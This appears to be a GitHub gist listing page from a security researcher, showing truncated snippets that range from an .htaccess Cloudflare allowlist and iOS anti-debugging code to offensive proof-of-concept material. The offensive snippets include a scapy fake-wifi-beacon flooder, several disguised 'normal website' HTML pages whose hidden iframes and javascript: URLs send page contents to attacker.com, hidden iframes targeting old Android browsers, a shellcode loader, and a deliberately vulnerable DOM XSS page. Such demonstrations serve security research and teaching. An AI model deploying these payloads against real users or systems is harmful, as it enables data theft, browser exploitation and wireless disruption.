Skip to content

Instantly share code, notes, and snippets.

@yehgdotnet
yehgdotnet / gist:6353e367cb1178017980d2437417d6a5
Created November 24, 2016 02:10
.htaccess (allow only cloudflare IP range) Raw
<Files 403.shtml>
order allow,deny
allow from all
</Files>
# https://www.cloudflare.com/ips-v4
# https://www.cloudflare.com/ips-v6
deny from all
allow from 103.21.244.0/22
@yehgdotnet
yehgdotnet / catchredir.m
Created October 15, 2017 16:59 — forked from joswr1ght/catchredir.m
Demonstration code to detect runtime method swizzling with Cydia Substrate/Cycript.
// Compile with:
// clang catchredir.m -o catchredir -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7 -framework Foundation
#import <Foundation/Foundation.h>
#import <stdio.h>
#import <objc/runtime.h>
@interface UrlConnection : NSObject
@property (strong) NSString *url;
- (void)connect;
@end
@yehgdotnet
yehgdotnet / fakebeacon.py
Created October 22, 2017 15:23 — forked from tintinweb/fakebeacon.py
scapy-fakebeacon - spawn lots of fake wifi access points by injecting beacon frames with scapy (essid)
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
#
# source: https://www.4armed.com/blog/forging-wifi-beacon-frames-using-scapy/
#
# requires:
# radiotap supported wifi nic/driver (frame injection) (works fine with Ralink RT2571W)
# iwconfig $iface mode monitor
# iw dev $iface set channel $channel
# or
@yehgdotnet
yehgdotnet / iosdebugdetect.cpp
Created February 28, 2018 13:22 — forked from joswr1ght/iosdebugdetect.cpp
Sample code to use ptrace() through dlsym on iOS to terminate when a debugger is attached. NOT FOOLPROOF, but it bypasses Rasticrac decryption.
// Build on OS X with:
// clang debugdetect.cpp -o debugdetect -arch armv7 -isysroot /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ -miphoneos-version-min=7
#import <dlfcn.h>
#import <sys/types.h>
#import <stdio.h>
typedef int (*ptrace_ptr_t)(int _request, pid_t _pid, caddr_t _addr, int _data);
void disable_dbg() {
ptrace_ptr_t ptrace_ptr = (ptrace_ptr_t)dlsym(RTLD_SELF, "ptrace");
ptrace_ptr(31, 0, 0, 0); // PTRACE_DENY_ATTACH = 31
}
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
This is a normal website. Look at these pictures of cats...
<script>
var spec = new Spec();
if (spec.isDeviceDetected() && spec.getOS() == "Android"
&& spec.getBrowser != "Chrome"
&& parseFloat(spec.getOSVersion()) < 4.4) {
var iframe = document.createElement('iframe');
iframe.style.display="none";
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("\u0000javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);
<html><head></head>
<body>
This is just a normal website...
<iframe id="if" name="test" height="0" width="0" src="http://www.salesforce.com"></iframe>
<script>
document.getElementById("if").style.visibility="hidden";
window.open("javascript:
var i=new Image();
i.src='http://attacker.com/save.php?'+document.body.innerHTML;
document.body.appendChild(i);
<html><head><script src="Spec.js/lib/Spec.js"></script></head>
<body>
<script>
var spec = new Spec();
if (spec.isDeviceDetected() && spec.getOS() == "Android" &&
parseFloat(spec.getOSVersion()) < 4.2) {
var iframe = document.createElement('iframe');
iframe.style.display="none";
iframe.src = "http://attacker.com:8080";
document.body.appendChild(iframe);
@yehgdotnet
yehgdotnet / Numerics.cs
Created March 2, 2018 09:04
Shellcode Stuffed Into A System.Numerics.BigInteger - Cause You Know Why Not ;-)
using System;
using System.Diagnostics;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
/*
Author: Casey Smith, Twitter: @subTee
@yehgdotnet
yehgdotnet / dom-xssed.htm
Last active March 3, 2018 08:21
DOM XSSed page
<html>
<head>
<title>DOM XSS vulnerable page</title>
</head>
<body>
<script>
var l = decodeURI(document.location.toLocaleString().split("?")[1]);
document.write(l);